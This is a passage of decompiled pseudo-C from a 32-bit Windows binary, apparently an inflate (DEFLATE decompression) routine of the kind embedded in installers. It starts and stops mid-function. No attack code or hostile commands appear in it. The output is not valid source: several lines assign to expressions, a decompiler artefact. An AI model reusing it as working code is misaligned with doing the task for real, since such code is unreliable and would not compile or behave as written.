                                                                                                                                    							L69:
                                                                                                                                    							__ecx = __ebp - 8;
                                                                                                                                    							__edi =  &(__esi[0x143]);
                                                                                                                                    							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                                                                    							__eax = 0;
                                                                                                                                    							 *(__ebp - 8) = 0;
                                                                                                                                    							__eax =  &(__esi[3]);
                                                                                                                                    							 *__edi = 7;
                                                                                                                                    							__eax = E0040711A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                                                                    							if(__eax != 0) {
                                                                                                                                    								L72:
                                                                                                                                    								 *__esi = 0x11;
                                                                                                                                    								while(1) {
                                                                                                                                    									L180:
                                                                                                                                    									_t396 =  *_t446;
                                                                                                                                    									if(_t396 > 0xf) {
                                                                                                                                    										break;
                                                                                                                                    									}
                                                                                                                                    									L1:
                                                                                                                                    									switch( *((intOrPtr*)(_t396 * 4 +  &M00407072))) {
                                                                                                                                    										case 0:
                                                                                                                                    											L101:
                                                                                                                                    											__eax = __esi[4] & 0x000000ff;
                                                                                                                                    											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                                    											__eax = __esi[5];
                                                                                                                                    											__esi[2] = __esi[5];
                                                                                                                                    											 *__esi = 1;
                                                                                                                                    											goto L102;
                                                                                                                                    										case 1:
                                                                                                                                    											L102:
                                                                                                                                    											__eax = __esi[3];
                                                                                                                                    											while(1) {
                                                                                                                                    												L105:
                                                                                                                                    												__eflags = __ebx - __eax;
                                                                                                                                    												if(__ebx >= __eax) {
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												L103:
                                                                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                                                                    													goto L182;
                                                                                                                                    												}
                                                                                                                                    												L104:
                                                                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                    												__ecx = __ebx;
                                                                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    												__ebx = __ebx + 8;
                                                                                                                                    												__eflags = __ebx;
                                                                                                                                    											}
                                                                                                                                    											L106:
                                                                                                                                    											__eax =  *(0x40a400 + __eax * 2) & 0x0000ffff;
                                                                                                                                    											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                                    											__ecx = __esi[2];
                                                                                                                                    											__eax = __esi[2] + __eax * 4;
                                                                                                                                    											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                                    											__ecx =  *__eax & 0x000000ff;
                                                                                                                                    											__eflags = __ecx;
                                                                                                                                    											if(__ecx != 0) {
                                                                                                                                    												L108:
                                                                                                                                    												__eflags = __cl & 0x00000010;
                                                                                                                                    												if((__cl & 0x00000010) == 0) {
                                                                                                                                    													L110:
                                                                                                                                    													__eflags = __cl & 0x00000040;
                                                                                                                                    													if((__cl & 0x00000040) == 0) {
                                                                                                                                    														goto L125;
                                                                                                                                    													}
                                                                                                                                    													L111:
                                                                                                                                    													__eflags = __cl & 0x00000020;
                                                                                                                                    													if((__cl & 0x00000020) == 0) {
                                                                                                                                    														goto L9;
                                                                                                                                    													}
                                                                                                                                    													L112:
                                                                                                                                    													 *__esi = 7;
                                                                                                                                    													goto L180;
                                                                                                                                    												}
                                                                                                                                    												L109:
                                                                                                                                    												__esi[2] = __ecx;
                                                                                                                                    												__esi[1] = __eax;
                                                                                                                                    												 *__esi = 2;
                                                                                                                                    												goto L180;
                                                                                                                                    											}
                                                                                                                                    											L107:
                                                                                                                                    											__esi[2] = __eax;
                                                                                                                                    											 *__esi = 6;
                                                                                                                                    											goto L180;
                                                                                                                                    										case 2:
                                                                                                                                    											L113:
                                                                                                                                    											__eax = __esi[2];
                                                                                                                                    											while(1) {
                                                                                                                                    												L116:
                                                                                                                                    												__eflags = __ebx - __eax;
                                                                                                                                    												if(__ebx >= __eax) {
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												L114:
                                                                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                                                                    													goto L182;
                                                                                                                                    												}
                                                                                                                                    												L115:
                                                                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                    												__ecx = __ebx;
                                                                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    												__ebx = __ebx + 8;
                                                                                                                                    												__eflags = __ebx;
                                                                                                                                    											}
                                                                                                                                    											L117:
                                                                                                                                    											 *(0x40a400 + __eax * 2) & 0x0000ffff =  *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                                    											__esi[1] = __esi[1] + ( *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                                    											__ecx = __eax;
                                                                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                    											__ebx = __ebx - __eax;
                                                                                                                                    											__eflags = __ebx;
                                                                                                                                    											__eax = __esi[4] & 0x000000ff;
                                                                                                                                    											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                                    											__eax = __esi[6];
                                                                                                                                    											__esi[2] = __esi[6];
                                                                                                                                    											 *__esi = 3;
                                                                                                                                    											goto L118;
                                                                                                                                    										case 3:
                                                                                                                                    											L118:
                                                                                                                                    											__eax = __esi[3];
                                                                                                                                    											while(1) {
                                                                                                                                    												L121:
                                                                                                                                    												__eflags = __ebx - __eax;
                                                                                                                                    												if(__ebx >= __eax) {
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												L119:
                                                                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                                                                    													goto L182;
                                                                                                                                    												}
                                                                                                                                    												L120:
                                                                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                    												__ecx = __ebx;
                                                                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    												__ebx = __ebx + 8;
                                                                                                                                    												__eflags = __ebx;
                                                                                                                                    											}
                                                                                                                                    											L122:
                                                                                                                                    											__eax =  *(0x40a400 + __eax * 2) & 0x0000ffff;
                                                                                                                                    											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                                    											__ecx = __esi[2];
                                                                                                                                    											__eax = __esi[2] + __eax * 4;
                                                                                                                                    											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                                    											__ecx =  *__eax & 0x000000ff;
                                                                                                                                    											__eflags = __cl & 0x00000010;
                                                                                                                                    											if((__cl & 0x00000010) == 0) {
                                                                                                                                    												L124:
                                                                                                                                    												__eflags = __cl & 0x00000040;
                                                                                                                                    												if((__cl & 0x00000040) != 0) {
                                                                                                                                    													goto L9;
                                                                                                                                    												}
                                                                                                                                    												L125:
                                                                                                                                    												__esi[3] = __ecx;
                                                                                                                                    												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                                                                    												__esi[2] = __eax;
                                                                                                                                    												goto L180;
                                                                                                                                    											}
                                                                                                                                    											L123:
                                                                                                                                    											__esi[2] = __ecx;
                                                                                                                                    											__esi[3] = __eax;
                                                                                                                                    											 *__esi = 4;
                                                                                                                                    											goto L180;
                                                                                                                                    										case 4:
                                                                                                                                    											L126:
                                                                                                                                    											__eax = __esi[2];
                                                                                                                                    											while(1) {
                                                                                                                                    												L129:
                                                                                                                                    												__eflags = __ebx - __eax;
                                                                                                                                    												if(__ebx >= __eax) {
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												L127:
                                                                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                                                                    													goto L182;
                                                                                                                                    												}
                                                                                                                                    												L128:
                                                                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                    												__ecx = __ebx;
                                                                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    												__ebx = __ebx + 8;
                                                                                                                                    												__eflags = __ebx;
                                                                                                                                    											}
                                                                                                                                    											L130:
                                                                                                                                    											 *(0x40a400 + __eax * 2) & 0x0000ffff =  *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                                    											__esi[3] = __esi[3] + ( *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                                    											__ecx = __eax;
                                                                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                    											__ebx = __ebx - __eax;
                                                                                                                                    											__eflags = __ebx;
                                                                                                                                    											 *__esi = 5;
                                                                                                                                    											goto L131;
                                                                                                                                    										case 5:
                                                                                                                                    											L131:
                                                                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                                                                    											__edx = __esi[3];
                                                                                                                                    											__eax = __eax - __esi;
                                                                                                                                    											__ecx = __eax - __esi - 0x1ba0;
                                                                                                                                    											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                                                                    											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                                                                    												__ecx = __eax;
                                                                                                                                    												__ecx = __eax - __edx;
                                                                                                                                    												__eflags = __ecx;
                                                                                                                                    											} else {
                                                                                                                                    												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                                                                    												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                                                                    												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                                                                    											}
                                                                                                                                    											__eflags = __esi[1];
                                                                                                                                    											 *(__ebp - 0x20) = __ecx;
                                                                                                                                    											if(__esi[1] != 0) {
                                                                                                                                    												L135:
                                                                                                                                    												__edi =  *(__ebp - 0x2c);
                                                                                                                                    												do {
                                                                                                                                    													L136:
                                                                                                                                    													__eflags = __edi;
                                                                                                                                    													if(__edi != 0) {
                                                                                                                                    														goto L152;
                                                                                                                                    													}
                                                                                                                                    													L137:
                                                                                                                                    													__edi = __esi[0x26e8];
                                                                                                                                    													__eflags = __eax - __edi;
                                                                                                                                    													if(__eax != __edi) {
                                                                                                                                    														L143:
                                                                                                                                    														__esi[0x26ea] = __eax;
                                                                                                                                    														__eax = E004070B2( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                    														__eax = __esi[0x26ea];
                                                                                                                                    														__ecx = __esi[0x26e9];
                                                                                                                                    														__eflags = __eax - __ecx;
                                                                                                                                    														 *(__ebp - 0x30) = __eax;
                                                                                                                                    														if(__eax >= __ecx) {
                                                                                                                                    															__edi = __esi[0x26e8];
                                                                                                                                    															__edi = __esi[0x26e8] - __eax;
                                                                                                                                    															__eflags = __edi;
                                                                                                                                    														} else {
                                                                                                                                    															__ecx = __ecx - __eax;
                                                                                                                                    															__edi = __ecx - __eax - 1;
                                                                                                                                    														}
                                                                                                                                    														__edx = __esi[0x26e8];
                                                                                                                                    														__eflags = __eax - __edx;
                                                                                                                                    														 *(__ebp - 8) = __edx;
                                                                                                                                    														if(__eax == __edx) {
                                                                                                                                    															__edx =  &(__esi[0x6e8]);
                                                                                                                                    															__eflags = __ecx - __edx;
                                                                                                                                    															if(__ecx != __edx) {
                                                                                                                                    																__eax = __edx;
                                                                                                                                    																__eflags = __eax - __ecx;
                                                                                                                                    																 *(__ebp - 0x30) = __eax;
                                                                                                                                    																if(__eax >= __ecx) {
                                                                                                                                    																	__edi =  *(__ebp - 8);
                                                                                                                                    																	__edi =  *(__ebp - 8) - __eax;
                                                                                                                                    																	__eflags = __edi;
                                                                                                                                    																} else {
                                                                                                                                    																	__ecx = __ecx - __eax;
                                                                                                                                    																	__edi = __ecx;
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    														__eflags = __edi;
                                                                                                                                    														if(__edi == 0) {
                                                                                                                                    															goto L183;
                                                                                                                                    														} else {
                                                                                                                                    															goto L152;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													L138:
                                                                                                                                    													__ecx = __esi[0x26e9];
                                                                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                                                                    													__eflags = __ecx - __edx;
                                                                                                                                    													if(__ecx == __edx) {
                                                                                                                                    														goto L143;
                                                                                                                                    													}
                                                                                                                                    													L139:
                                                                                                                                    													__eax = __edx;
                                                                                                                                    													__eflags = __eax - __ecx;
                                                                                                                                    													if(__eax >= __ecx) {
                                                                                                                                    														__edi = __edi - __eax;
                                                                                                                                    														__eflags = __edi;
                                                                                                                                    													} else {
                                                                                                                                    														__ecx = __ecx - __eax;
                                                                                                                                    														__edi = __ecx;
                                                                                                                                    													}
                                                                                                                                    													__eflags = __edi;
                                                                                                                                    													if(__edi == 0) {
                                                                                                                                    														goto L143;
                                                                                                                                    													}
                                                                                                                                    													L152:
                                                                                                                                    													__ecx =  *(__ebp - 0x20);
                                                                                                                                    													 *__eax =  *__ecx;
                                                                                                                                    													__eax = __eax + 1;
                                                                                                                                    													__ecx = __ecx + 1;
                                                                                                                                    													__edi = __edi - 1;
                                                                                                                                    													__eflags = __ecx - __esi[0x26e8];
                                                                                                                                    													 *(__ebp - 0x30) = __eax;
                                                                                                                                    													 *(__ebp - 0x20) = __ecx;
                                                                                                                                    													 *(__ebp - 0x2c) = __edi;
                                                                                                                                    													if(__ecx == __esi[0x26e8]) {
                                                                                                                                    														__ecx =  &(__esi[0x6e8]);
                                                                                                                                    														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                                                                    													}
                                                                                                                                    													_t357 =  &(__esi[1]);
                                                                                                                                    													 *_t357 = __esi[1] - 1;
                                                                                                                                    													__eflags =  *_t357;
                                                                                                                                    												} while ( *_t357 != 0);
                                                                                                                                    											}
                                                                                                                                    											goto L23;
                                                                                                                                    										case 6:
                                                                                                                                    											L156:
                                                                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                                                                    											__edi =  *(__ebp - 0x30);
                                                                                                                                    											__eflags = __eax;
                                                                                                                                    											if(__eax != 0) {
                                                                                                                                    												L172:
                                                                                                                                    												__cl = __esi[2];
                                                                                                                                    												 *__edi = __cl;
                                                                                                                                    												__edi = __edi + 1;
                                                                                                                                    												__eax = __eax - 1;
                                                                                                                                    												 *(__ebp - 0x30) = __edi;
                                                                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                                                                    												goto L23;
                                                                                                                                    											}
                                                                                                                                    											L157:
                                                                                                                                    											__ecx = __esi[0x26e8];
                                                                                                                                    											__eflags = __edi - __ecx;
                                                                                                                                    											if(__edi != __ecx) {
                                                                                                                                    												L163:
                                                                                                                                    												__esi[0x26ea] = __edi;
                                                                                                                                    												__eax = E004070B2( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                    												__edi = __esi[0x26ea];
                                                                                                                                    												__ecx = __esi[0x26e9];
                                                                                                                                    												__eflags = __edi - __ecx;
                                                                                                                                    												 *(__ebp - 0x30) = __edi;
                                                                                                                                    												if(__edi >= __ecx) {
                                                                                                                                    													__eax = __esi[0x26e8];
                                                                                                                                    													__eax = __esi[0x26e8] - __edi;
                                                                                                                                    													__eflags = __eax;
                                                                                                                                    												} else {
                                                                                                                                    													__ecx = __ecx - __edi;
                                                                                                                                    													__eax = __ecx - __edi - 1;
                                                                                                                                    												}
                                                                                                                                    												__edx = __esi[0x26e8];
                                                                                                                                    												__eflags = __edi - __edx;
                                                                                                                                    												 *(__ebp - 8) = __edx;
                                                                                                                                    												if(__edi == __edx) {
                                                                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                                                                    													__eflags = __ecx - __edx;
                                                                                                                                    													if(__ecx != __edx) {
                                                                                                                                    														__edi = __edx;
                                                                                                                                    														__eflags = __edi - __ecx;
                                                                                                                                    														 *(__ebp - 0x30) = __edi;
                                                                                                                                    														if(__edi >= __ecx) {
                                                                                                                                    															__eax =  *(__ebp - 8);
                                                                                                                                    															__eax =  *(__ebp - 8) - __edi;
                                                                                                                                    															__eflags = __eax;
                                                                                                                                    														} else {
                                                                                                                                    															__ecx = __ecx - __edi;
                                                                                                                                    															__eax = __ecx;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    												__eflags = __eax;
                                                                                                                                    												if(__eax == 0) {
                                                                                                                                    													goto L183;
                                                                                                                                    												} else {
                                                                                                                                    													goto L172;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    											L158:
                                                                                                                                    											__eax = __esi[0x26e9];
                                                                                                                                    											__edx =  &(__esi[0x6e8]);
                                                                                                                                    											__eflags = __eax - __edx;
                                                                                                                                    											if(__eax == __edx) {
                                                                                                                                    												goto L163;
                                                                                                                                    											}
                                                                                                                                    											L159:
                                                                                                                                    											__edi = __edx;
                                                                                                                                    											__eflags = __edi - __eax;
                                                                                                                                    											if(__edi >= __eax) {
                                                                                                                                    												__ecx = __ecx - __edi;
                                                                                                                                    												__eflags = __ecx;
                                                                                                                                    												__eax = __ecx;
                                                                                                                                    											} else {
                                                                                                                                    												__eax = __eax - __edi;
                                                                                                                                    												__eax = __eax - 1;
                                                                                                                                    											}
                                                                                                                                    											__eflags = __eax;
                                                                                                                                    											if(__eax != 0) {
                                                                                                                                    												goto L172;
                                                                                                                                    											} else {
                                                                                                                                    												goto L163;
                                                                                                                                    											}
                                                                                                                                    										case 7:
                                                                                                                                    											L173:
                                                                                                                                    											__eflags = __ebx - 7;
                                                                                                                                    											if(__ebx > 7) {
                                                                                                                                    												__ebx = __ebx - 8;
                                                                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                                                                    												_t380 = __ebp - 0x38;
                                                                                                                                    												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                                                                    												__eflags =  *_t380;
                                                                                                                                    											}
                                                                                                                                    											goto L175;
                                                                                                                                    										case 8:
                                                                                                                                    											L4:
                                                                                                                                    											while(_t425 < 3) {
                                                                                                                                    												if( *(_t448 - 0x34) == 0) {
                                                                                                                                    													goto L182;
                                                                                                                                    												} else {
                                                                                                                                    													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                                                                    													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                                                                    													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                                                                    													_t425 = _t425 + 8;
                                                                                                                                    													continue;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    											_t425 = _t425 - 3;
                                                                                                                                    											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                                                                    											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                                                                    											asm("sbb ecx, ecx");
                                                                                                                                    											_t408 = _t406 >> 1;
                                                                                                                                    											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                                                                    											if(_t408 == 0) {
                                                                                                                                    												L24:
                                                                                                                                    												 *_t446 = 9;
                                                                                                                                    												_t436 = _t425 & 0x00000007;
                                                                                                                                    												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                                                                    												_t425 = _t425 - _t436;
                                                                                                                                    												goto L180;
                                                                                                                                    											}
                                                                                                                                    											L6:
                                                                                                                                    											_t411 = _t408 - 1;
                                                                                                                                    											if(_t411 == 0) {
                                                                                                                                    												L13:
                                                                                                                                    												__eflags =  *0x42e3b0;
                                                                                                                                    												if( *0x42e3b0 != 0) {
                                                                                                                                    													L22:
                                                                                                                                    													_t412 =  *0x40a424; // 0x9
                                                                                                                                    													_t446[4] = _t412;
                                                                                                                                    													_t413 =  *0x40a428; // 0x5
                                                                                                                                    													_t446[4] = _t413;
                                                                                                                                    													_t414 =  *0x42d22c; // 0x0
                                                                                                                                    													_t446[5] = _t414;
                                                                                                                                    													_t415 =  *0x42d228; // 0x0
                                                                                                                                    													_t446[6] = _t415;
                                                                                                                                    													L23:
                                                                                                                                    													 *_t446 =  *_t446 & 0x00000000;
                                                                                                                                    													goto L180;
                                                                                                                                    												} else {
                                                                                                                                    													_t26 = _t448 - 8;
                                                                                                                                    													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                                                                    													__eflags =  *_t26;
                                                                                                                                    													_t416 = 0x42d230;
                                                                                                                                    													goto L15;
                                                                                                                                    													L20:
                                                                                                                                    													 *_t416 = _t438;
                                                                                                                                    													_t416 = _t416 + 4;
                                                                                                                                    													__eflags = _t416 - 0x42d6b0;
                                                                                                                                    													if(_t416 < 0x42d6b0) {
                                                                                                                                    														L15:
                                                                                                                                    														__eflags = _t416 - 0x42d46c;
                                                                                                                                    														_t438 = 8;
                                                                                                                                    														if(_t416 > 0x42d46c) {
                                                                                                                                    															__eflags = _t416 - 0x42d630;
                                                                                                                                    															if(_t416 >= 0x42d630) {
                                                                                                                                    																__eflags = _t416 - 0x42d690;
                                                                                                                                    																if(_t416 < 0x42d690) {
                                                                                                                                    																	_t438 = 7;
                                                                                                                                    																}
                                                                                                                                    															} else {
                                                                                                                                    																_t438 = 9;
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    														goto L20;
                                                                                                                                    													} else {
                                                                                                                                    														E0040711A(0x42d230, 0x120, 0x101, 0x408414, 0x408454, 0x42d22c, 0x40a424, 0x42db30, _t448 - 8);
                                                                                                                                    														_push(0x1e);
                                                                                                                                    														_pop(_t440);
                                                                                                                                    														_push(5);
                                                                                                                                    														_pop(_t419);
                                                                                                                                    														memset(0x42d230, _t419, _t440 << 2);
                                                                                                                                    														_t450 = _t450 + 0xc;
                                                                                                                                    														_t442 = 0x42d230 + _t440;
                                                                                                                                    														E0040711A(0x42d230, 0x1e, 0, 0x408494, 0x4084d0, 0x42d228, 0x40a428, 0x42db30, _t448 - 8);
                                                                                                                                    														 *0x42e3b0 =  *0x42e3b0 + 1;
                                                                                                                                    														__eflags =  *0x42e3b0;
                                                                                                                                    														goto L22;
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    											L7:
                                                                                                                                    											_t423 = _t411 - 1;
                                                                                                                                    											if(_t423 == 0) {
                                                                                                                                    												 *_t446 = 0xb;
                                                                                                                                    												goto L180;
                                                                                                                                    											}
                                                                                                                                    											L8:
                                                                                                                                    											if(_t423 != 1) {
                                                                                                                                    												goto L180;
                                                                                                                                    											}
                                                                                                                                    											goto L9;
                                                                                                                                    										case 9:
                                                                                                                                    											while(1) {
                                                                                                                                    												L27:
                                                                                                                                    												__eflags = __ebx - 0x20;
                                                                                                                                    												if(__ebx >= 0x20) {
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												L25:
                                                                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                                                                    													goto L182;
                                                                                                                                    												}
                                                                                                                                    												L26:
                                                                                                                                    												__eax =  *(__ebp - 0x38);
                                                                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    												__ecx = __ebx;
                                                                                                                                    												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    												__ebx = __ebx + 8;
                                                                                                                                    												__eflags = __ebx;
                                                                                                                                    											}
                                                                                                                                    											L28:
                                                                                                                                    											__eax =  *(__ebp - 0x40);
                                                                                                                                    											__ebx = 0;
                                                                                                                                    											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                                                                    											 *(__ebp - 0x40) = 0;
                                                                                                                                    											__eflags = __eax;
                                                                                                                                    											__esi[1] = __eax;
                                                                                                                                    											if(__eax == 0) {
                                                                                                                                    												goto L53;
                                                                                                                                    											}
                                                                                                                                    											L29:
                                                                                                                                    											_push(0xa);
                                                                                                                                    											_pop(__eax);
                                                                                                                                    											goto L54;
                                                                                                                                    										case 0xa:
                                                                                                                                    											L30:
                                                                                                                                    											__eflags =  *(__ebp - 0x34);
                                                                                                                                    											if( *(__ebp - 0x34) == 0) {
                                                                                                                                    												goto L182;
                                                                                                                                    											}
                                                                                                                                    											L31:
                                                                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                                                                    											__eflags = __eax;
                                                                                                                                    											if(__eax != 0) {
                                                                                                                                    												L48:
                                                                                                                                    												__eflags = __eax -  *(__ebp - 0x34);
                                                                                                                                    												if(__eax >=  *(__ebp - 0x34)) {
                                                                                                                                    													__eax =  *(__ebp - 0x34);
                                                                                                                                    												}
                                                                                                                                    												__ecx = __esi[1];
                                                                                                                                    												__eflags = __ecx - __eax;
                                                                                                                                    												__edi = __ecx;
                                                                                                                                    												if(__ecx >= __eax) {
                                                                                                                                    													__edi = __eax;
                                                                                                                                    												}
                                                                                                                                    												__eax = E00405CBA( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                                                                    												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                                                                    												_t80 =  &(__esi[1]);
                                                                                                                                    												 *_t80 = __esi[1] - __edi;
                                                                                                                                    												__eflags =  *_t80;
                                                                                                                                    												if( *_t80 == 0) {
                                                                                                                                    													L53:
                                                                                                                                    													__eax = __esi[0x145];
                                                                                                                                    													L54:
                                                                                                                                    													 *__esi = __eax;
                                                                                                                                    												}
                                                                                                                                    												goto L180;
                                                                                                                                    											}
                                                                                                                                    											L32:
                                                                                                                                    											__ecx = __esi[0x26e8];
                                                                                                                                    											__edx =  *(__ebp - 0x30);
                                                                                                                                    											__eflags = __edx - __ecx;
                                                                                                                                    											if(__edx != __ecx) {
                                                                                                                                    												L38:
                                                                                                                                    												__esi[0x26ea] = __edx;
                                                                                                                                    												__eax = E004070B2( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                    												__edx = __esi[0x26ea];
                                                                                                                                    												__ecx = __esi[0x26e9];
                                                                                                                                    												__eflags = __edx - __ecx;
                                                                                                                                    												 *(__ebp - 0x30) = __edx;
                                                                                                                                    												if(__edx >= __ecx) {
                                                                                                                                    													__eax = __esi[0x26e8];
                                                                                                                                    													__eax = __esi[0x26e8] - __edx;
                                                                                                                                    													__eflags = __eax;
                                                                                                                                    												} else {
                                                                                                                                    													__ecx = __ecx - __edx;
                                                                                                                                    													__eax = __ecx - __edx - 1;
                                                                                                                                    												}
                                                                                                                                    												__edi = __esi[0x26e8];
                                                                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                                                                    												__eflags = __edx - __edi;
                                                                                                                                    												if(__edx == __edi) {
                                                                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                                                                    													__eflags = __edx - __ecx;
                                                                                                                                    													if(__eflags != 0) {
                                                                                                                                    														 *(__ebp - 0x30) = __edx;
                                                                                                                                    														if(__eflags >= 0) {
                                                                                                                                    															__edi = __edi - __edx;
                                                                                                                                    															__eflags = __edi;
                                                                                                                                    															__eax = __edi;
                                                                                                                                    														} else {
                                                                                                                                    															__ecx = __ecx - __edx;
                                                                                                                                    															__eax = __ecx;
                                                                                                                                    														}
                                                                                                                                    														 *(__ebp - 0x2c) = __eax;
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    												__eflags = __eax;
                                                                                                                                    												if(__eax == 0) {
                                                                                                                                    													goto L183;
                                                                                                                                    												} else {
                                                                                                                                    													goto L48;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    											L33:
                                                                                                                                    											__eax = __esi[0x26e9];
